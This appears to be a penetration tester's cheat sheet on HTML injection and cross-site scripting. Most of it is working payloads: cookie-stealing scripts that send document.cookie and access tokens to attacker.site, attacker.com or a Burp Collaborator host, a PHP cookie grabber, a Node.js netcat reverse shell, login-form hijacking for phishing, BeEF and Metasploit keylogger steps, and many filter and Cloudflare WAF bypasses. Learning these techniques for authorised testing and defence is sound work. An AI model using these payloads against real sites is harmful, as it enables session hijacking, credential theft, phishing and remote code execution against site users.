HTML & XSS Injection

HTML Injection:

For example in a web site in which we can create notes or posts we can inject HTML commands.

<h1>Esto es una prueba</h1>
This should put a bigger text like a heading.

<marquee>Esto se va a desplazar</marquee>
This should put the text in movement.

Redirection:

test<a href=\u0022http://bing.com/\u0022>ClickMe!</a>

Content spoofing (link injection):

"><IMG SRC="/WF_XSRF.html">
<img src='data:image/gif;base64,R0lGODlhyADIAPIFAP%2FyAAoKCgAAAcRiAO0cJAAAAAAAAAAAACH%2FC05FVFNDQVBFMi4wAwEAAAAh%2BQQJCgAFACwAAAAAyADIAAAD%2F1i63P4wykmrvTjrzbv%2FYCiOZGmeaKqubOu%2BcCzPdG3feK7vfO%2F%2FwKBwSCwaj8ikcslsOp%2FQqHRKrVqv2Kx2y%2B16v%2BCweEwum8%2FotHrNbrvf8Lh8Tq%2Fb7%2Fi8fs%2Fv%2B%2F%2BAgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq%2BwsbKztLW2t7i5uru8vb6%2FwMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t%2Fg4eLj5OXmkwLpAszq68vt7OrI7QH1AfDD9Pb4wvr1%2FMH83ZP3S6C9gemAGdxH0NfCfw17PUTozqG6gwcBkph4EP%2FSRI0jONrzeBEjxIQnRNYjmc7kyYolVAZgKcAlRRDt2gHYybPnzo6PPkbkkFOdz6MAgDoSitJD0XRIfSptxBQm0adRe05lpBMpSAtds2bduiisz68VzIo9SlaRWp5oKbxdy7NtorkA4k7AS9cumKeAA9vMiNXr0L1G6a71%2ByWw45yDGRaNqtcBX8U%2FR555zLlmZIp4Kze4jJmxl86PP4NOfFQ0A9KKTWeReRCzbcNNI8C%2BLRsLbXu3g8M9bJm1cKS9r%2Fyudzy46N22k1tZHqD57efGrdfVbEamVuDazxIvAF249NklI39nHr4n2vLBz%2FtOP3h99fbDc7%2FOjj%2Fzys3%2F9NlkX387vcdff%2FJtgVpL4PVnIFTHqQbHgp6x5%2BB48Nln04QL1kbggwI0J%2BEbFHp4oX4LZLhdZICYiJ9sZg0g4wD2MeJiezAaNyONK860yI3h5QjhTjvW%2BGODL3Knm44zGqmIi6EdmJSSELSz45UzJqgHlFLiJaQAWGKpZR5cDimemU4umU6YV46JR5kh4hYnW1Q%2BYCWbWdZpyEEE9EnAbX7%2B2SOFd4qpZyF8%2BgmoooMSumaYbt6RaJ%2BLUtqoo2xGasekgmIWqH2OPmrof44AqV2RPKEqlqZ9mGqdqgDAGhWrfLjaHKyyIneojUi2h2uTi%2B36iGq3%2FSpjX8KW%2Blmxh8AS2exYyTZCrG3G8rhqtLyqR%2B2zudJJaie2EpgmJ%2BGK65%2BPnpRrLq2HqCsuu3v2aq636IIr77zjbuIugfAiei%2B%2B54LiooA9DuxSvpoYbJKGSBIc8CcKY8SwhVMu3KPADR9ccMYWPyyKXSAf6pq%2Bh4b87X4oflzyyienOB7GLStgcr0oW%2FVEAgAh%2BQQJCgAFACwsAHwAbABMAAAD%2F1i63P4wPkGFvDjrzXO1XSiOJPSVaKpK5%2Bq%2B4RfMQQvfOCPTdu6%2Fu1nvR0QFa5WiUnSkISnL6KbJS0qvrIrTOcR6FVSh9UsuhJ%2Bg29n5PXdXa1pbuxVDcfHZnFK3p2F5AXsCfWgpHx8AiouMimxebmMkiBWNlgCPWJF3JZQUl42ZV5t%2FI54CoIyiUomXbx6VqbKrUa2Wrxi2spe0S7qMuBe%2Fu6pykLG3khzDxI7GYKfRlIVcnqDBDszNxXoL0t901Gja2A3a287d0ODS4n7kysLI6Jai7N%2Fu4%2FPA8Vmf9Lyq8MlHA6BBAOXOHaw2kGCAgwAT7oO4iCEhhw8pbpP4T%2F8jNzQYM3rcxRHVyIrPzISj9vHkolcKNdpbWailS4T9VHa8mU6QN5p9bLqEOdHlzIYsUc7gSXQnz1462TlhmjNmqny57l1cerOpSYNY5d2b2rVq0WZh%2FUktWJaTubPE0qogazSliXkD8g74KIXuSag68OrlG8XvSMA%2Fd%2Brdq9TnEsMeEa%2F7CmAx4cdsFcFz2jgrhcWg9UqG4Xcz5csRPoQOPfpF6bPaRqtevbi1i9ecNZ%2BVXYF2bbtEnBAYToAe8eKNtSKibXuFcOLGoSdX3nt187k0jkcf%2FpF6ddbAfzznjk77dO%2FMwyuBrNHyIvez1PfNfBJ%2B5cG7rudgT9G%2BfVCl%2BuHAH0T%2B4RefOmUskA89BeYVl3xeLIhOg4wd6FiCCki4DYUPIoihhs1wmB%2BEGGZIH08AkljigCj2VOIFLLYYIBYxojjjFTU%2BpeKHJ7YYyo4J5njTjfNx5WNAHr7YgF81NcZkUJ0pCcGTdXxE5RaoScnAlVzS16SLWjrQpZGYQNnTlWFKANWa6pWTZgFsJmminFG9iUGcF27ZZk52Kqgenne5NUICACH5BAUKAAUALDAAfABsAEwAAAP%2FWLrc%2FjA%2BQYW8OOvNc7VdKI4k9JVoqkrn6r7hF8xBC984I9N27r%2B7We9HRAVrlaJSdKQhKcvopslLSq%2BsitM5xHoVVKH1Sy6En6Db2fk9d1drWlu7FUNx8dmcUrenYXkBewJ9aCkfHwCKi4yKbF5uYySIFY2WAI9YkXcllBSXjZlXm38jngKgjKJSiZdvHpWpsqtRrZavGLayl7RLuoy4F7%2B7qnKQsbeSHMPEjsZgp9GUhVyeoMEOzM3FegvS33TUaNrYDdrbzt3Q4NLifuTKwsjolqLs3%2B7j88DxWZ%2F0vKrwyUcDoEEA5c4drDaQYICDABPug7iIISGHDyluk%2FhP%2FyM3NBgzetzFEdXIis%2FMhKP28eSiVwo12ltZqKVLhP1UdryZTpA3mn1suoQ50eXMhixRzuBJdCfPXjrZOWGaM2aqfLnuXVx6s6lJg1jl3ZvatWrRZmH9SS1YlpO5s8TSqiBrNKWJeQPyDvgohe5JqDrw6uUbxe9IwD936t2r1OcSwx4Rr%2FsKYDHhx2wVwXPaOCuFxaD1SobhdzPlyxE%2BhA49%2BkXps9pGq169uLWL15w1n5VdgXZtu0ScEBhOgB7x4o21IqJte4Vw4sahJ1fee3XzuTSORx%2F%2BkXp11sB%2FPOeOTvt078zDK4Gs0fIi97PU9818En7lwbuu52BP0b59UKX64cAfRP7hF586ZSyQDz0F5hWXfF4siE6DjB3oWIIKSLgNhQ8iiKGGzXCYH4QYZkgfTwCSWOKAKPZU4gUsthggFjGiOOMVNT6l4ocnthjKjgnmeNON83HlY0AevtiAXzU1xmRQnSkJwZN1fETlFqhJycCVXNLXpItaOtClkZhA2dOVYUoA1ZrqlZNmAWwmaaKcUb2JQZwXbtlmTnYqqB6ed7k1QgIAOw%3D%3D' />

XSS Injection (Cross-Site Scripting):

Cross Site Scripting is an attack in which its ultimate purpose is to inject HTML (known as HTML injection) or run code (JavaScript) in a user's Web browser.

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

https://xss.js.org/#/xss01

https://github.com/humblelad/Awesome-XSS-Payloads

- Reflected

Reflects on the screen the code we enter (or the results of the code). It only affects the person who sends the malicious code, not all users.

To find XSS of type reflected, it is enough to look for places of the web page where the input of the user is included in the output of the web page. Once found, we will try to enter HTML/Js code using GET(the easiest of all)/POST methods, cookies and/or HTTP headers.

If we can see the source code of the page, we have to look to see in which part of the source code the page expresses the OUTPUT entered by the user and in which way.

- Persistent/Stored XSS:

Execute the malicious code for all those users who are inside the web site, since it is injected and stored in the source code of the web.

- DOM (Document Object Model):

Abuse the hierarchy of documents, for example if function Y depends on X (from which it takes data, etc.), and we infect X, we will infect Y as well.

Identification

Pop-up alerts:

<script>alert(1)</script>
<script>alert("Testing XSS")</script>
"><script>alert("Testing XSS")</script>
<script>alert('This is a test');</script>
www.example.com/search.php?find=<script>alert('This+is+a+test')<%2fscript>
http://vuln_page.com/index.php?name=<body onload="alert(PAYLOAD)">
http://vuln_page.com/index.php?name="><bodyonload="alert(PAYLOAD)
''!--"<XSS>=&{()}
"><script>alert(document.cookies);</script>

To open the debugger in the developer console rather than triggering a popup alert box:

<script>debugger;</script>

Due to sandbox domains it's better to use alert(document.domain) or alert(window.origin) rather than alert(1), so a replacement for <script>alert(1)</script>:

<script>alert(document.domain.concat("\n").concat(window.origin))</script>

While alert() is nice for reflected XSS it can quickly become a burden for stored XSS because it requires to close the popup for each execution, so console.log() can be used instead to display a message in the console of the developer console (doesn't require any interaction):

<script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>

Exploits and Tools

We start a server to listen in:

python -m SimpleHTTPServer 8080

Then in a public post, note or web we put a blind .jpg that is going to send us the sesion cookie of people who click on it:

<script>document.write('<img src="http://Our IP Address:8080/example.jpg?cookie=' + document.cookie + '">')</script>

<script> var i = new Image(); i.src="http://attacker.site/get.php?cookie="+escape(document.cookie)</script>

<script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>

Other example of cookie hijacking exploit link:

http://alice.xxx/members/search.php?kw=<script>var i=new Image();i.src="http://attacker.site/steal.php?q="%2bdocument.cookie;</script>

If we can inject content into an image 'src' attribute of an <img>, for example, when uploading an image to a post, we can load a malformed image to trigger an error and inject javascript if the error is triggered:

data:image/png;base64,[BASE64_DATA]' onerror='var img=new Image();img.src="http://www.attacker.com/steal.php?c="+document.cookie;'

Here in the base64 blow, we should inject an image in base64 intentionally malformed or truncated to trigger an error, for example:

data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAU!!!' onerror='var i=new Image();i.src="http://www.attacker.com/steal.php?"+document.cookie;'
data:image/jpeg;base64,/9j/4AAQSkZJ!!!' onerror='var i=new Image();i.src="http://www.attacker.com/steal.php?"+document.cookie;'

We can also trigger the XSS if the image was loaded successfully with onload instead of onerror. In this case, we need to upload a valid image instead of a corrupted one, examples with base64 blows representing a 1x1 pixels are shown below:

data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/wcAAgEBAB8Gka4AAAAASUVORK5CYII=' onload='var i=new Image();i.src="http://www.attacker.com/steal.php?"+document.cookie;'
data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEAAAAAAAD/4QBGRXhpZgAATU0AKgAAAAgAAQESAAMAAAABAAEAAIdpAAQAAAABAAAAJgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAAA7aADAAQAAAABAAABPAAAAAD/2wBDAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/2wBDAQQBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH/wAARCAABAAEDASIAAhEBAxEB/8QAFgABAQEAAAAAAAAAAAAAAAAAAAUG/8QAIhAAAgICAgIDAQAAAAAAAAAAAQIAAxEEEiExQQUTYXGB/8QAFQEBAQAAAAAAAAAAAAAAAAAAAQL/2gAMAwEAAhEDEQA/AK5oFKUClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAK//Z' onload='var i=new Image();i.src="http://www.attacker.com/steal.php?"+document.cookie;'

Victim here will se nothing but we will receive his cookie.

Then with EditThisCookie plugin we can steal the victim session (Cookie Hijacking).

- Data Grabber

Create grabber.php:

<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>

Then use one of the following payloads:

<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>

Cross-origin resource sharing (CORS) can be understood as a controlled relaxation of the same-origin policy. CORS provides a controlled way to share cross-origin resources.

To exploit it, fire up Burp Collaborator.

Inject the following in the vulnerable parameter (comments section):

<script>
  fetch('https://<SESSION>.burpcollaborator.net', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
  });
</script>

Then anyone seeing that page will be sending their cookies to our burp server, press pull-now in burp.

- js script execution

To make a person open a js script:

First we share the script through a python server port 80, then in the XSS vulnerable field:

<script src="http://{My IP}/malicious.js"></script>

If the web runs node.js we can get a reverse shell whith the following content in the malicious js script:

require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242')

require('child_process').exec('cmd /c powershell -e {encoded shell}')

- Defacement

Although you will never deface your client's website, defacement is considered one of the most immediately visible damages that an XSS may cause.

Moreover, it happens to be the best way to explain to your client that XSSs should be patched as soon as possible.

A typical DOM manipulation is useful at modifying the page appearance is the following way:

document.body.innerHTML="<h1>Defaced</h1>"

- XSS for Advanced Phishin Attacks

The simplest way in performing XSS phishing on a simple login page is to alter the ACTION parameter of the FORM tag. A form tag usually has this structure:

<form name="loginform" method="POST" action="/checklogin.cgi">

By injecting the following JavaScript: document.forms[0].action="https"//hacker.site/steal.php the page will remain completely unchanged, no modification to the appearance whatsoever, and the URL in the location bar will remain the genuine URL (beside our payload maybe) of teh website the victim wants to login to. SSL will not help the victim either.

- BeEF (Browser Explotation Framework)

Once an XSS vulnerability is found, BeEF is the fastest way to exploit it and gain control of the remote browser. Moreover, if the browser is unpatched or old, BeEF and Metasploit Browser Autopwn are capable of exploiting it to give you a remote shell on the remote machine.

Using Reflected XSS, to hook a victim, we must create a payload URL and make the victim load it. If it is Stored XSS, we can wait for the victim to click on the vlunerable parameter or see it (i.e. comments section).

- XSS Keylogger Metasploit

use auxiliary/server/capture/http_javascript_keylogger

To embed the keylogger into any webpage, use a reachable URL along with HTML <script> tag appended with /[whatever].js.

- Gxss

https://github.com/KathanP19/Gxss

Light Weight Tool for checking reflecting Parameters in a URLs.

- Dalfox

https://github.com/hahwul/dalfox

Detecting and verifying XSS.

Can be used with gxss to find Reflected XSS within URL Parameters once identified (Fingerprinting section):

cat urls-params.txt | Gxss -c 100 | dalfox pipe --skip-bav --skip- mining-all --skip-grepping

Or with GF:

cat urls-params.txt | gf xss | sed 's/=.*/=' | dalfox pipe

cat urls-params.txt | gf xss | sed 's/=.*/=/' | dalfox pipe

- DOM Invader

Intercept > Open Browser

Burp Suite Container Extension > DOM Invader > Turn on > Set up your canary

To manually test:

  • Injecte the canary, right-click > Inspect > Argumented DOM

  • Then to follow the sinks, click on stack tace and then click on where that value occurs to open it on the inspector.

To inject into URL:

  • right-click > Inspect > Argumented DOM > Inject into URL

To inect into forms:

  • right-click > Inspect > Argumented DOM > Inject into forms

  • this will inject a unique canary into every form, look at the sinks, url generated, … Then complete the payload in order to exploit the vulnerability

To set up auto fire events and redirection prevention:

  • Burp Suite Container Extension > DOM Invader > Turn on both

  • Then, click reload and it will find the sinks, preventing to redirect to other pages missing the vulnerability

To intercept messages:

  • Burp Suite Container Extension > DOM Invader > Turn on it, but turn off the subsections and check the messages manually

To spoof the origin to check if the event listener checks it before accesing data:

  • Turn on postmessages, then check spoof origin in the specific message you want by leaving the spoof origin unchecked in the generic options, or check it to spoof it in every request

To generate automated messages to locate vulnerabilities in postmessages:

  • Turn on postmessages > Generate atomated messages > Reload

  • Then we can reply to the message by replacing the canary in the data section with a xss payload

Bypass Browser Filters

- XSS Filter Bypass Techniques

To bypass filters that rely on scanning text for specific suspicious strings, attackers can encode any number of characters in a variety of ways:

Some or all characters can be written as HTML entities with ASCII codes to bypass filters that directly search for a string like javascript:

<a href="&#106;avascript:alert('Successful XSS')">Click this link!</a>

To evade filters that look for HTML entity codes by scanning for &# followed by a number, hexadecimal encoding can be used for ASCII codes:

<a href="&#x6A;avascript:alert(document.cookie)">Click this link!</a>

Base64 encoding can be used to obfuscate attack code – this example also displays an alert saying “Successful XSS”:

<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">

All encoded character entities can be from 1 to 7 numeric characters, with initial zeroes being ignored, so any combinations of zero padding are possible. Also note that semicolons are not required at the end of entities:

<a href="&#x6A;avascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>

Character codes can be used to hide XSS payloads:

<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>

To bypass sanitization methods:

">';alert(1);'<=svg>

- Whitespace Embedding

Browsers are very lenient when it comes to whitespace in HTML and JavaScript code, so embedded non-printing characters can be used for bypassing filters:

Newlines and carriage returns are usually ignored, and can also be encoded:

<a href="jav&#x0A;a script:&#x0A;ale&#x0Drt;('Successful XSS')">Visit google.com</a>

Some filters may look for "javascript: or 'javascript: and will not expect spaces after the quote. In fact, any number of spaces and meta characters from 1 through 32 (decimal) will be valid:

<a href=" &#x8; &#23; javascript:alert('Successful XSS')">Click this link!</a>

If the filter simply scans the code once and removes specific tags, such as <script>, nesting them inside other tags will leave valid code after they are removed:

<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>

Spaces between attributes can often be omitted. Also, a slash is a valid separator between the tag name and attribute name, which can be useful to evade whitespace limitations in inputs – note no whitespace in the entire string:

<img/src="funny.jpg"onload=&#x6A;avascript:eval(alert('Successful&#32XSS'))>

Another example without any whitespace using the less common svg tag:

<svg/onload=alert('XSS')>

Exploit browser efforts to interpret and complete malformed tags. Here’s an example that omits the href attribute and quotes (most other event handlers can also be used):

<a onmouseover=alert(document.cookie)>Go to google.com</a>

And an extreme example of browser completion for a completely wrecked img tag:

<img """><script src=xssattempt.js></script>">

- Internet Explorer Abuse

Internet Explorer provides some unique filter evasion vectors (many legacy enterprise applications continue to rely on old IE versions).

The majority of XSS checks will check for JavaScript, but Internet Explorer up to IE10 would also accept VBScript:

<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>

Dynamic properties – the ability to specify script expressions as CSS values:

body { color: expression(alert('Successful XSS')); }

Deprecated dynsrc attribute can provide another vector:

<img dynsrc="javascript:alert('Successful XSS')">

Use backticks when you need both double and single quotes:

<img src=`javascript:alert("The name is 'XSS'")`>

In older IE versions, you could also include a script disguised as an external style sheet:

<link rel="stylesheet" href="http://example.com/xss.css">

- Legacy Methods

Vectors that are rejected by most modern browsers:

Background image manipulation:

<body background="javascript:alert('Successful XSS')">

Or using a style:

<div style="background-image:url(javascript:alert('Successful XSS'))">

Images without img tags:

<input type="image" src="javascript:alert('Successful XSS')">

Redirect using a meta tag: In some older browsers, this will display an alert by evaluating Base64-encoded JavaScript code:

<meta http-equiv="refresh" content="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

Vector that uses UTF-7 encoding to hide the XSS payload (completely unsupported):

<head><meta http-equiv="content-type" content="text/html; charset=utf-7"></head>+adw-script+ad4-alert('xss');+adw-/script+ad4-

- JSON Encode Bypass

The trick here is to use the fact that inside JSON encoding, a proper HTML tag is possible:

p="><!--
q=--><svg onload=alert(1)>
p="1='
q='><svg onload=alert(1)>

- Other common bypasses

Capitalizing the <script> tag to <SCRIPT>:

<SCRIPT>alert(‘XSS’)</SCRIPT>

If we can see commas or changes in the screen, we can bypass this condition completing first script tag:

</script><script>alert(‘XSS’);</script>

If it shows the common page, we could try wrapping script inside the script:

<scri<SCRIPT>pt>alert(‘xss’)</scri</SCRIPT>pt>

If we receive an error when injecting a malicous script, we could use onerror tag:

<IMG SRC=xyz.png onerror=”alert(‘xxs’)”>

If the script gets executed but the application sanitize the ‘alert’ keyword, we can use eval() function. Aditionally, we can convert the ASCII value of alert(‘XSS’) into the string with eval() function:

<script> eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 88, 83, 83, 39, 41)) </script>

When HTML encoding on special characters is added we need to bypass such condition by checking with ‘ (single quote), “ (double quote), etc.:

‘;alert(‘XSS’);//

If $_SERVER[‘PHP_SELF’] is missused, we can append the following payload:

/”><script>alert(“XSS”)</script>

- Cloudflare WAF Bypass

Payload:

<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">

Payload before obfuscation:

<video><source onerror="alert.constructor.constructor('return this')().alert('‏0f')">

Others:

<script> jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

Potential Bypasses:

1. Unicode encoding:

<scr&#x9Cipt>alert(1)</scr&#x9Cipt>

2. Using HTML entities:

<img src=x onerror=&#x61lert&#x28&#x27123&#x27&#x29>

3. Using JavaScript URL encoding:

<script src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x68&#x74&#x74&#x70&#x3A&#x2F&#x2F&#x77&#x77&#x77&#x2E&#x61&#x6C&#x65&#x72&#x74&#x2E&#x63&#x6F&#x6D&#x2F&#x73&#x63&#x72&#x69&#x70&#x74&#x27&#x29>

4. Using JavaScript encoding:

<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

5. Using CSS expressions:

<style>@import'\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u0061\u006C\u0065\u0072\u0074\u002E\u0063\u006F\u006D\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u0027\u0029';</style>

6. Using JavaScript comments:

<script>/*-/**/alert(1)/*-/*-->/*</script>

7. Using event handlers:

<body onload=alert(1)>

8. Using JavaScript encoding with comments:

<script>eval(String.fromCharCode(/*-*/97/*-*/,/*-*/108/*-*/,/*-*/101/*-*/,/*-*/114/*-*/,/*-*/116/*-*/,/*-*/40/*-*/,/*-*/49/*-*/,/*-*/41/*-*/))</script>

9. Using JavaScript encoding with whitespace:

<script>eval(String.fromCharCode( 97, 108, 101, 114, 116, 40, 49, 41 ))</script>

10. Using JavaScript encoding with different encoding schemes:

<script>eval(String.fromCharCode(0x61,0x6C,0x65,0x72,0x74,0x28,0x31,0x29))</script>

Last updated